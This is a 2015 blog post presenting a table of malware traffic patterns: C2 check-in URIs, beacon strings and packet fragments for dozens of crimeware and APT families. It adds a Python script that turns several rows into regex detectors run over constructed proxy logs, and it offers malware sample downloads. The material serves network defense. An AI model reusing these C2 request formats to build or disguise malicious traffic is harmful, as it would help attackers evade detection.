Thursday, February 5, 2015

Library of Malware Traffic Patterns


Update, February 2015: use the new link below for the new interface and the latest updates.

Traffic analysis has long been a primary method of malware identification, and the thousands of IDS signatures written against network traffic are the daily proof. Signatures definitely help, but the ability to recognize malware traffic patterns by eye has always been an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming, and it is difficult to keep track of malware features without access to a well designed and constantly updated malware database. This started as a "personal notes" spreadsheet of GET and POST requests for different malware families, compiled from open sources. We decided others might find it useful too.

Click a column header to bring the most recent entries to the top, and sort by the other columns as needed. Allow a few seconds for the table to load from the Google Sheet. In the sheet, URI and User-Agent cells may contain spaces inserted for easier cell wrapping; strip them if you export the data, since a real request carries no such spaces.
Yes, you can download the samples mentioned in the spreadsheet: see the "dl" column in the full spreadsheet table and the corresponding links to the download location. The archives use the Contagio password scheme (email Mila or admin at deependresearch.org).
Image credit: Jay Walker Library. Source: Vancouver Sun.

VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS"

List of malware families with the request patterns observed and, where available, downloads of their samples and pcaps (click on the link above for the full post). Several URIs in the table (/, /index.php, /index.htm, /gate.php, config.bin) are shared by unrelated families and are too generic to alert on by themselves; treat them as context for the rest of the session rather than as signatures.
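To show how rows from the table turn into something a network defender can actually run, here is an added example; it is my own code, not part of the original post or of the Contagio / DeepEnd Research spreadsheet. It generalizes a handful of rows (the Kuluoz.B downloader, the Upatre / Dyre versioned paths, the Poweliks click-fraud queries, the SQL carried by Letsgo / TabMsgSQL, the Zeus config.bin fetch and the shared gate.php check-ins) into regular expressions, strips the wrapping spaces the sheet inserts into URI cells, and runs the patterns over constructed proxy log lines. The regexes, the log format, the hostnames and the client addresses are all assumptions made for the demo.

```python
"""Added example (not from the original post or the spreadsheet): turn a few
URI patterns from the table into regexes and run them over web-proxy log
lines. The regexes are my generalisations of the listed rows; the log
format, hosts and addresses below are constructed for the demo."""
import re
from urllib.parse import urlsplit

# (family label, required HTTP method or None for any, regex over path+query)
PATTERNS = [
    # Kuluoz.B downloader row: /index.php?r=gate&fq=<8 hex>&group=...
    ("Asprox / Kuluoz.B downloader", "GET",
     re.compile(r"^/index\.php\?r=gate&fq=[0-9a-f]{8}&group=")),
    # Upatre / Dyre rows: /1501us22//0/51-SP3/0/, /2001uk11/HOME/1/0/0/
    ("Upatre / Dyre check-in path", "GET",
     re.compile(r"^/\d{4}[a-z]+\d*/(?:HOME/|/)\d+/[^/]+/\d+/$")),
    # Poweliks click-fraud rows
    ("Poweliks click-fraud query", "GET",
     re.compile(r"^/query\?version=[\d.]+&sid=\d+&builddate=\d+&q=")),
    # Letsgo / TabMsgSQL rows carry raw SQL in the str= parameter
    ("Letsgo / TabMsgSQL (SQL in query string)", "GET",
     re.compile(r"[?&]str=(?:select|insert)%20", re.IGNORECASE)),
    # Zeus configuration fetch rows
    ("Zeus config fetch", "GET", re.compile(r"/config\.bin$")),
    # Deliberately low specificity: gate.php is used by Andromeda, Chanitor,
    # Pony and others, so a hit needs the rest of the session for context.
    ("generic gate.php check-in (Andromeda / Chanitor / Pony)", "POST",
     re.compile(r"/gate\.php$")),
]


def normalize_uri(cell: str) -> str:
    """Strip the whitespace the Google Sheet inserts into URI cells for
    wrapping. Only safe for URI / User-Agent cells; the hex-dump rows in the
    table use spaces as real separators."""
    return re.sub(r"\s+", "", cell)


def match_request(method: str, url: str) -> list:
    """Return the labels of every pattern that matches this request."""
    parts = urlsplit(url)
    target = parts.path + ("?" + parts.query if parts.query else "")
    hits = []
    for family, want_method, rx in PATTERNS:
        if want_method and want_method != method.upper():
            continue
        if rx.search(target):
            hits.append(family)
    return hits


# Constructed log format: "<epoch> <client ip> <method> <url> <status>"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def scan_log(lines) -> list:
    """Return a list of (client ip, family label, url) for every matching line."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # not a request line we understand: skip, do not crash
        for family in match_request(m["method"], m["url"]):
            findings.append((m["src"], family, m["url"]))
    return findings


# Constructed sample traffic; hosts are reserved example names.
SAMPLE_LOG = """\
1423123001.101 172.16.253.130 GET http://c2.example.net/index.php?r=gate&fq=acc0e9de&group=sl15&debug=0 200
1423123002.220 172.16.253.130 GET http://c2.example.net/2307stat//0/51Service%20Pack%202/0/ 200
1423123003.315 172.16.253.129 POST http://panel.example.org/new/gate.php 200
1423123004.410 172.16.253.129 GET http://www.example.com/css/global.css 200
1423123005.502 172.16.253.131 GET http://search.example.net/query?version=1.7&sid=1101&builddate=201214&q=low+testosterone+in+men&ua=Mozilla&lang=en-US 200
1423123006.600 172.16.253.131 GET http://c2.example.net/safe/1.asp?rands=DWLLOXLGLH&acc=vy&str=select%20top%201%20from%20tab_message 200
"""

if __name__ == "__main__":
    # A URI cell copied from the sheet, with its wrapping spaces removed
    print(normalize_uri("/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw"))
    for src, family, url in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{src}  {family}  {url}")
```

Run against a real proxy log by replacing SAMPLE_LOG with the file contents and adjusting LOG_LINE to the log's layout. The gate.php pattern is kept on purpose as a low-confidence indicator: on its own it matches several unrelated families, which is exactly why the method and the surrounding session matter more than the path. These patterns describe the 2014 to 2015 campaigns in the table and will age with them.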



typefamilymethoduri
CRIMECarberb / /GluptebaGET/get_ads.php?yy=1&aid=2&atr=exts&src=199
/go/p1011105.subexts
/go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1
/javascript/live_cd/popunder_script-1400195675.js
/images/ffadult/css/header.css
/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css
CRIMEFiesta EKGET/?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G
&QPy3i=J4HP58S7h&dRPS8=7bi7Y
/?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c
/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR
/?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5
/?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2
CRIMEFiesta EKGET/yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9
/ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94
/ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54
CRIMEGongdad / Gong Da compromised site redirectsGET/pg/kcp/index.html
/popup/index.html
/my/by4.html
CRIMEGongdad / Gong Da EKGET/data/file/cr/index.html
/data/file/cr/swfobject.js
/data/file/cr/jquery-1.4.2.min.js
/data/file/cr/main.html
/data/file/cr/AyVpSf.jar
/data/file/cr/com.class
/data/file/cr/edu.class
/data/file/cr/net.class
/data/file/cr/org.class /windos.exe
CRIMEDalexis LoaderGET/tmp/pack.tar.gz
/assets/pack.tar.gz
/piwigotest/pack.tar.gz
/histoiredesarts/pack.tar.gz
/fit/pack.tar.gz
APTGholee / Rocket KittenGET / POST/index.php?c=Ud7atknq&r=17117d
/index.php?c=Ud7atknq&r=1710b2
CRIMEZemotGET/b/shoe
CRIMEZemot DL via AsproxGET/catalog/159
CRIMEZemot downloading RovnixGET/mod_jshopping_products_gdle/mod_smartslider2/
CRIMEZemot downloading RerdomGET/mod_jshoppi/soft32.dl
CRIMERerdomGET/b/eve/
CRIMEClickfraudGET/b/req/
CRIMECidox / Rerdom / ClickfraudGET/b/eve/e91425775cc5d7e657bd2cc7
/b/letr/21D84379F768D95442B92BC5
/b/opt/E1805AD5D79824076249D696
/b/req/FDD953BA382388758DF27AE4
/b/pkg/
CRIMECidox / Rerdom / Clickfraud - clickurl GETGET/x/48petqwk9//AA/0
CRIMECidox / Rerdom / Clickfraud - clickurl GETGET/2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.com
APT / CRIMEScieron / Httneilc / HTClientpacket data 0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82
0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38
0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04
0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13
0040 00 12 00 63 01 00
CRIMEZollard RFIPOST/cgi-bin/php? %2D%64+%......%2D%6E
CRIMEUpatreGET/js/jquery-1.41.15.js
/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js
/js/jquery-1.41.15.js?get_message=3290013886
CRIMECryptowall 3.0POSThttp://proxy1-1-1.i2p/fee4roy2hih9
http://payto4gtpn5czl2.torforall.com/ofs20c
CRIMEAndromedaPOST/ldr.php
CRIMEAngler EK ChainGET/t19jl0hvv2.php
CRIMEAngler EK ChainGET/752s2n0ndw.php
CRIMEAngler EK ChainGET/erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp
CRIMEAngler EK ChainGET/P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN
CRIMEAngler EK ChainGET/models/runway/ring/header.js
CRIMEAngler EK ChainGET/code/decrease/revenue/core.js
CRIMEAsprox / KuluozGET/include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak=
HTTPS over port 443 as a possible connectivity check
CRIMEAsprox / KuluozPOST/index.php
CRIMEChanitorPOST/gate.php
CRIMEChanitor DownloadsGET/wp-includes/js/tinymce/plugins/wpfullscreen/1.php
/wp-includes/js/tinymce/skins/lightgray/1.php
/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php
/wp-includes/js/tinymce/plugins/wpfullscreen/1.php
CRIMECryptowallPOST/532boskc3i0
/nvebi4m4ggdokz
/wbkljtzpimbryt
CRIMECryptowallGET/wp-content/themes/exiportal/dh5x3a1815j
/wp-content/themes/esther/6l7de
CRIMEDridex payloadGET/mopsi/popsi.php
/js/bin.exe
CRIMEFake AV post compromiseGET/?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn
CRIMEFiesta EKGET/txf9p_v8/ye1PlchZ7X9pFcl0o-y3
/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287
/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406
CRIMEFlashpack EKGET/sv62a76d18537/index.php
CRIMEGameThiefPOST/tj.asp
CRIMEGameThiefGET/count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack
CRIMEGypothyGET/bigbight/kinkong.txt
CRIMEH-W0rmPOST/SpCoderHere
CRIMEKaiXin EKGET/indexindex/
/indexindex/gg.jpg
/indexindex/jquery-1.4.2.min.js
/indexindex/swfobject.js
/indexindex/main.html
/xzz1.exe
/indexindex/NlNwQh.jar
/indexindex/com.class
/indexindex/edu.class
/indexindex/net.class
/indexindex/org.class
CRIMEKovterPOST/9/form.php
/11/form.php
/w1/form.php
/1/feed.php
CRIMENuclear EKGET / POST/XhBWV0gBT08OVFVW.html
/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA
/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j
CRIMEPoweliksGET/query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
CRIMERedirect to Fiesta EKGET/?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO &
m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3
CRIMESweet Orange EKGET/admin4_account/mobile/movies.php?timeline=18
/bad/generic/help.php?state=39
/cnet/tmp/Indy_admin/investor.php?setup=20
/dbadmin/wp-admin/hex/help.php?state=33
/forums/example/screens/investor.php?setup=20
/gcc/tmp/bad/help.php?state=25
/ip/ch/investor.php?setup=20
/profiles/stat/movies.php?timeline=21
CRIMESweet Orange EKGET/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064
/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair
/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix
/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249
/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535
/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil
/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954
/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315
CRIMETBDPOST/store/
CRIMETBD Post FlashpackGET/r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
/search?q=wrestling&subid=4699
/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
CRIMETBD Proxy (Htbot?)GET/ocfg.php?command=getip
/ocfg.php?command=getid
/ocfg.php?command=ghl&id=1493496
/ocfg.php?command=dl&id=1493496
/ocfg.php?command=version&id=1493496
/ocfg.php?command=getbackconnect
/pointer.php?proxy=%3A24635&secret=BER5w4evtjszw4MBRW
CRIMEUpatreGET/1501us22//0/51-SP3/0/
/1501us22//1/0/0/
/2807cw//1/0/0/
/2807cw//41/5/4/
/2807cw//0/51-SP2/0/
/1201uk1//1201uk1//0/51-SP3/0/
/1201uk1//1/0/0/
/1201uk1//41/7/4/ "
/2307stat//0/51Service%20Pack%202/0/
/2307stat//1/0/0/
/2307stat//41/5/4/
CRIMEVavtrak / NeverquestPOST/collection/0000004E/00/9EBD6132
CRIMEZeusGET/backup/config.bin
/en/images/config.bin
/guardnow/config.bin
/guardnow/config.bin
CRIMEZeusPOST/choosen/helps/file.php
CRIMEAdWare Kraddare.ILGET/bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... ..@RwNPRwNN::
CRIMEAdWare Kraddare.ILPOST/bv/config.php
CRIMEDyreGET/2001uk11/HOME/1/0/0/
CRIMEDyreGET/mandoc/eula012.pdf
CRIMEDyreGET/mandoc/ml1from1.tar
CRIMEDyre plugin dlGET/ineede900.rar
CRIMEKazyGET/cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR
CRIMEMudropGET/gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c=
CRIMEChePro (Brazil.banker)GET/ini/xvwmmwb.mod
CRIMECryptolockerPOST/home/
CRIMEReedum220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
APTVidgrabPOST(172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|.
APTPage / stscout / Elise / lStudio / WuminsGET/29af9cdc/page_12082223.html
CRIMETijcontGET/s/blog_b2afd7fe01019tkf.htm
APTDarkcometGET/a.php?id=c2ViYWxpQGxpYmVyby5pdA==
CRIMEKelihosGET/index.htm
CRIMEKuluoz Run command from C2nc=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e
APTnjRAT / Backdoor.LV lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'| Examiner|'|'|2013-06-21|'|'|USA|'|'| Win XP ProfessionalSP2 ...

171.ll|'|'|Li4uLi4uLk5FVy4uLi4u Li4uX0F FNTJDMzdE|'|'|SENTA|'|'| sentai55|'|'|15-01-29|'|'||'|'| Win 8.1SP0 x64|'|'|Yes|'|'|0.7d| '|'|..|'|'||'|'|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0.

251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJD MzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd 2VsbCB2LiBIb2JieSBMb2JieSBBYnJpZGdlZCBbQ29tcGF0aWJpbGl0eSBNb 2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2,

lv|'|'|VHJvamFuX0M0NkY2RTk= |'|'|MARK|'|'|user |'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]
CRIMEChimerka.1 / Refyes.APOST/sys.php
CRIMESalityGET/images/logos.gif?1f5428=8212640
CRIMENitedremGET/down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393
CRIMENitedremGET/upx/kod.txt?k=123&t=7215
CRIMENitedremGET...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:...............
CRIMENitedremGET/config.txt?&t=4593
CRIMENitedremGET/fish.jpg?&t=4426
CRIMESalityGET/?12da89=12355930
CRIMESalityGET/images/logos.gif?114bbc=9068000
CRIMESalityGET/setting.doc
CRIMETorpig /Sinowal miniloaderGET/
CRIMETorpig /Sinowal miniloaderGET/search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0
CRIMEEK PopadsGET/?7d456d68729292e9843cb9dde2d2f7b4=34
CRIMEEK PopadsGET/4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swf
CRIMEEK PopadsGET/855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar
CRIMEEK PopadsGET/?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in
CRIMEEK PopadsGET/39ff9ff8c3b603d8eed017df64dd2799.eot
CRIMEAlina POS v5.6POST/duck/push.php
CRIMEAlina POS v5.6POST/adobe/version_check.php
CRIMEAlina POS v6.0POST/adobe/version_check.php
APT (IN)Hanove / TouristPOST/kamp.php
APTSurtr 2nd Stage DL00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
APTSurtr 2nd Stage DL00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
APTSurtr Initial GET00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
APTTaleretGET/
APTTaleretGET/jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU-
CRIMESweet Orange EKGET/in.php?q=WPOChVXlw9QiOTwtCbg+ uSk36elyOCiUwI99U0PYxA==
CRIMEArcomRat / DokstormacPOSTS_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^] username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption [!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^]
CRIMEArdamax keyloggerSMTP220 smtp.mail.yahoo.com ESMTP ready
EHLO DELLXT
250-smtp.mail.yahoo.com
CRIMEMatsnu - MBR wiping ransomwarePOST/f44/myse.php
CRIMEMutopy DownloaderGET/d/conh11.jpg
CRIMEMutopy Downloader initial callbackGET/protocol.php?p=3894120584&d=4fQm27CpL9m6oC7 QvLZomrXyeYvptmyetaVE2deiLdi4
CRIMESymmi Remote File InjectorGET/img/seek.cgi?lin=100&db=dfs
/ae1.php
/ggu.php
/wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies
CRIMEMatsnu - MBR wiping ransomwareGET/inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458 &stat=0&ver=2000803&loc=0x0409&os=Windows%20XP
CRIMEAdware HotbarPOST/vic.aspx?ver=4.0.1158.0&rnd=595937
CRIMEBlackhole v2GET/7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622
CRIMEUSteal.D220---------- Welcome to Pure-FTPd ----------
APTHangover Smackdown MinaproGET/flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2
CRIMECutwail / PushdoPOST/?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe
APTMediana ProxyGET/index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0
CRIMEZeusPOST/orders2010.php
/busted.php
CRIMEGypthoyPOST/opt/mainpage.php
APTHupigon / Graybird........................................;... Windows XP 5.1 (2600.Service Pack 3).......................... ......................................$...DELLXT.................................... .................................... ........................................... 4s.love.......HACK..
APTVariant Letsgo / TabMsgSQL downloader (comment crew)GET/index.htm
APTTapaouxGET/ol/yahoo/banner4.php?jpg=../yahoo
CRIMEHorst ProxyGET/socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0
CRIMEPassAlertGET/loader/bin/file1.exe
CRIMEBitcoinminerPOST/
CRIMEKaragany LoaderGET/user/go.php?html=do
APTGh0stGh0st....d...x.Kc``....@....\..L@:8..,39U! 1
APTIXESHEGET/AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA
x_bigfix_client_string: baQMyZrdqDAA
APT2KoreanBanker DLGET/web/down/kbs.exe
APTPlugxSSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png
CRIMEPowerLoaderPOST/postnuke/blog.php
APTRssFeeder (moved from TBD tab, common name still unknown) 2nd stagePOST/orange/news.php
APTRssFeeder (moved from TBD tab, common name still unknown) initialGETPOST/data/rss
APTSwamiGET/im/linux.php
CRIMEGameThiefGET/xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16
CRIMEBeebone downloaderGET/0/?f|-1813912965Admin
/a/76876332/1
CRIMENeutrino EK varPOST/cxiqocvbqd
APTComfoo / Vinself / MspubPOST/BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/
APTDestory Rat / Sogu / ThoperPOST/update?id=000f72b8
APT2Disttrack / ShamoonGET/ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203
CRIMEAvatar RootkitGET/search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance
APT9002POST9002..................wx....9002..................wx....9002.......................
APTMSWab /YayihPOST/bbs/info.asp
CRIMEZeroAccess / SirefefGET/stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25
/count.php?page=952000&style=LED_g&nbdigits=9
CRIMEZeroAccess / Sirefef ppc fraud - redirectGETHTTP/1.1 302 Moved Temporarily
APT9002POST/2d
CRIMEAsprox / Kuluoz gets list of C2sGET/4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0
CRIMEAsprox / Kuluoz CheckinGET/4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF
CRIMEAsprox / Kuluoz GETs spam templateGET/78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82
CRIMECarberbPOST/kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm
CRIMEFakeAV var (via Kuluoz - Asprox botnet)GET/AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F
APTFavoritesGET/download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE
APTFavoritesGET/search?qu=
APTFavoritesGET/search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE
APTFavoritesGET/search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE
APTFavoritesPOST/search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH
APTFavoritesPOST/upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE
APTGh0stGET/cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel]
APTGh0st varGET/h.gif?pid =113&v=130586214568 HTTP/ 1. 1
CRIMEGuntior - CN bootkitGET/yx/tongji.html
CRIMEKuluoz.B downloaderGET/index.php?r=gate&fq=acc0e9de&group=sl15&debug=0
CRIMERanbyus / Triton (Spy, Banking, smart cards)POST/releases/index.php
CRIMEUrausy (Ransomware)GET/ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php
APTGlassesGET/ewpindex.htm
APTIEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRATPOST/index000000001.asp
APTLURKGETLURK0........x.kf.e.apgpbpa0c..#........
APTDNSWatch / ProtuxGET/dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve
APTDNSWatch / ProtuxGET/news.jpg
APTDNSWatch / ProtuxPOST/PHqgHumeay5705.mp3
CRIMEAndromedaPOST/new/gate.php
CRIMECitadelPOST/g.php
CRIMECitadel (Zbot var)POST/C270suqdh/file.php
CRIMEPony loaderPOST/ponyb/gate.php HTTP/1.0
CRIMEReedumGET220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
APTAPT1 WEBC2_RAVEGET/comp/sem/resources.htm
APTbackdoor ?GET/18110123/page_32262 308.html
APTBanechant 1GET/IGKKT
APTBanechant payload dl 2GET/adserv/logo.jpg HTTP /1.1
APTBeebusGET/windosdate/v6/default.aspx?ln=en-us
APTBeebus C2 checkinGET/s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1
APTBeebus C2 checkinGET/s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1
APTBeebus data sendPOST/s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2
CRIME EKBlackhole 2GET/fded177fe12651bb038f3f11b01c4168/q.php
APTCookies /Cookiebag / DalbotGET/1799.asp
APTCookies /Cookiebag / DalbotGET/3961.html
Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs=
APTCookies /Cookiebag / DalbotGET/8223.asp (also can be like /2007.asp,/2013.asp etc
APTCookies /Cookiebag / DalbotGET/indexs.zip
APTCoswidGET/old/google.png
APTCVE-2012-0754 SWF in DOCGET/test.mp4
APTCVE-2012-0779GET/essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000
CRIMEDarkmegiGET/20111230.jpg
CRIMEDarkness DDos v8gGET/index.php?uid=587609&ver=8g%20XP
APTDepyotGET/new/3d/d/pdf.php?id=2
APTDestory Rat / Sogu / ThoperPOST/update?id=000f6b50
APTDestory Rat / Sogu / ThoperPOST/update?id=3109c2a2
